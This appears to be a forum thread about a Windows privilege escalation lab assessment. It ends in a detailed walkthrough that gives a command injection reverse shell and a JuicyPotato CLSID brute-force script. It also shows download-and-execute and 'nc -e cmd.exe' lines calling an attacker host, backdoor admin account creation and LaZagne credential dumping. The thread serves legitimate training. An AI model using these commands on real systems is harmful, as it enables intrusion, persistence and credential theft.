One of the task in Skills Assessment - Part I is: “Find the password for the ldapadmin account somewhere on the system”. I searched around all the box with low privileged shell but I cannot find ldap admin password. I used all the techniques described in the module. Any clue?
4 Likes
Has anyone had luck here? I finished the rest of the skill assessment but I’m still stuck here too… any tips?
2 Likes
Hi All, I also stuck on this question for a long time and finally find the password today!!!
Question (“Find the password for the ldapadmin account somewhere on the system.”) itself already contain hint and please find and look file carefully with “nice” privileges account.
2 Likes
I tried with SYSTEM privileges and still had no luck
1 Like
For the life of me, I can’t escalate the privileges. I pretty much right away discovered and exploited command injection vulnerability and used it to upload various tools on the server (juicypotato, roguepotato, printspoofer, nc…). I checked the privs on account I currently control and I see that I have SeImpersonatePrivilege enabled, but none of the tools seems to work (either via command injection and catching a shell or directly via meterpreter session):
-
juicypotato - exits with
COM → recv failed with error: 10038 -
printspoofer - exits with
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening…
[-] Operation failed or timed out. -
roguepotato - exits with
[+] Starting RoguePotato…
[!] RogueOxidResolver not run locally. Ensure you run it on your remote machine
[] Creating Pipe Server thread…
[] Creating TriggerDCOM thread…
[] Listening on pipe \.\pipe\RoguePotato\pipe\epmapper, waiting for client to connect
[] Calling CoGetInstanceFromIStorage with CLSID:{4991d34b-80a1-4291-83b6-3328366b9097}
[*] IStoragetrigger written:106 bytes
[-] Named pipe didn’t received any connect request. Exiting …
I tried many different CLSIDs (matched the OS version and build from systeminfo data) but none seems to work. I’m starting to think that this is not the intended way. Can anyone please provide any hints? 
2 Likes
Hey @r3r00t youre on the right track and doing everything right. DM me on discord (same handle) and we can troubleshoot when I get my notes pulled up.
Hey @SuprN0vaSc0t1a , just as you replied, I managed to pick the right CLSID, as it seems that was the main issue. But I do appreciate your assistance. I kind of had the exact same dilemmas as you, especially in regard to picking the listening port…
And to answer the OPs question from all the way up, when searching for those two other things (files), it’s about having the right set of privileges so you can actually access things that you otherwise initially can’t.
I finished this module and took detailed notes, so if anyone needs help feel free to message me!
2 Likes
Hello,
I am also stuck finding the password for “ldapadmin”.
I understand it is not a user on that system. However, I had no luck finding it using the Credential Hunting methodology shown in the module. I am still with my initial user privileges of the IIS-user. Is there anything I can do to get additional access to files or log data prior to privilege escalation?
Any hints are welcome!
2 Likes
I had the best luck after privilege escalation. You do not need that password for escalation, only for that question.
If any of you all are still on here. Im now also working on part 1 skills assessment. Im not sure how to exploit the command injection vulnerability.
Ive tried a few netcat one liners made for windows CMD but not getting reverse shells on those. Using some firewall commands I know the machine got windows firewall active so that could be interfering with the reverse shell.
Anytips or hints?
Hi, I did the escalation but I can’t find anywhere that damned password. Can you help me?
3 Likes
I am stuck at the same place. I rooted the box with JuicyPotato but for the love of me still cant find the “ldapadmin” password. I have tried everything, string search, config files search and even registry entries search. Still clueless… I finished the entire module but this question.
hi im stuck at Windows Privilege Escalation Skills Assessment - Part I i have command execution but i cant get the reverse shell to work any hint
@truthreaper I used the Metasploit module “exploit/windows/misc/hta_server” to get a meterpreter shell.
The command will look like this: 10.10.x.x | mshta.exe http://10.10.x.x:8080/BKVPpG8.hta
I am working on PrivEsc now.
@jackyLam What do you mean by “nice” privileges? Administrator? I got admin via Juicy Potato but where is the dang file? LOL
Sometimes, y’all have to go back to the drawing board when you get stuck during penetration testing or any engagement, I banged my head so many times before I finally get to solve this particular assessment. So if you’re stuck, do follow this steps:
-
Get a webshell from the command injection vuln. Grab Powershell payload from PayloadAllTheThings. Second Powershell reverse shell worked for me. Intercept normal request with burp and paste your shell. (example: 127.0.0.1 & ). Make sure you url encode your powershell because of bad characters that might break your shell.
-
Do normal enumeration and your privilege check. You will find out that SeImpersonatePrivilege is enabled. Here is where the trick begin. JuicyPotato won’t work for you directly off the box. The reason is because you didn’t provide right port for your COM server.
Checking CLSIDs
First, you will need some executables apart from juicypotato.exe. Download Join-Object.ps1 and load it into your PS session and grab possible CLSIDs to test. Then download test_clsid.bat (change the path to the CLSID list and to the juicypotato executable) and execute it. It will start trying every CLSID, and when the port number changes, it will mean that the CLSID worked.
Navigate to C:\Users\Public\Documents\ directory and drop all your tools here.
- JuicyPotato.exe
- nc.exe
- Join-Object.ps1 (juicy-potato/Join-Object.ps1 at master · ohpe/juicy-potato · GitHub)
- CLSID.list (juicy-potato/CLSID.list at master · ohpe/juicy-potato · GitHub)
- Test_clsid.bat (juicy-potato/test_clsid.bat at master · ohpe/juicy-potato · GitHub)
First download all the files to your attack machine. start up a webserver with python (python3 -m http.server 9001) and on the target, run (wget http://attack-ip:9001/JuicyPotato.exe -o JuicyPotato.exe) do this for all the 5 tools needed for the task.
If you wget the files without the -o flag, all the files won’t save on the target machine.
You might want to do some few changes to test_clsid.bat before transfering it to the target machine.
Here is the content:
@echo off
:: Starting port, you can change it
set /a port=10000
SETLOCAL ENABLEDELAYEDEXPANSION
FOR /F %%i IN (CLSID.list) DO (
echo %%i !port!
juicypotato.exe -z -l !port! -c %%i >> result.log
set RET=!ERRORLEVEL!
:: echo !RET!
if “!RET!” == “1” set /a port=port+1
)
You can change CLSID.list // .\CLSID.list if that is the name you save your sample CLSID.list with but make sure you prepend .\ to run from the current directory or specify the absolure path to where it is saved.
do the same to juicypotato.exe (.\je.exe or .\juicypotato.exe) depending on the name you saved it with.
Next:
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
Import-Module .\Join-Object.ps1
Next:
cmd /c .\test_clsid.bat // If everything goes as plan, you will see lists of CLSID and port number. Anytime the Port number changes, The CLSID before the next port number is a valid clsid. But don’t get too excited about this, copy the CLSID (using ctrl + f ) find the CLSID against the list of CLSID on this site Windows Server 2016 Standard | juicy-potato. If the CLSID matches user NT Authority\System. that means you’re good to go.
NEXT:
.\jp.exe -l -c “” -p c:\windows\system32\cmd.exe -a “/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString(‘http://attacker-ip/Invoke-PowershellTcp.ps1’)” -t *
or
JuicyPotato -l <newly found port> -c "<newly found clsid>" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe attacker-ip listening-port" -t *
If everything goes as plan, you will get NT Authority system privilege.
- Create a new user (net user attacker P@ssw0rd! /add"
- Add attacker to admin group (net localgroup Administrators attacker /add)
- We discovered that port 3389 is open from our inital nmap scan, so we give attacker remote access. (net localgroup “Remote Management Users” attacker /add"
To make your good life easy, you can now RDP with the newly created account.
Your first flag is inside Administrator deskop page.
Next flag, ldapadmin password, You have to download Lazagne.exe to the target machine and since you’re already admin, it will dump all passwords and hashes. where you will find ldapadmin password.
Final flag, open cmd.exe and run dir /S /B confidential.txt (Make sure you run it from C:\ directory)
REACH OUT TO ME IF YOU"RE STILL HAVING ISSUES
11 Likes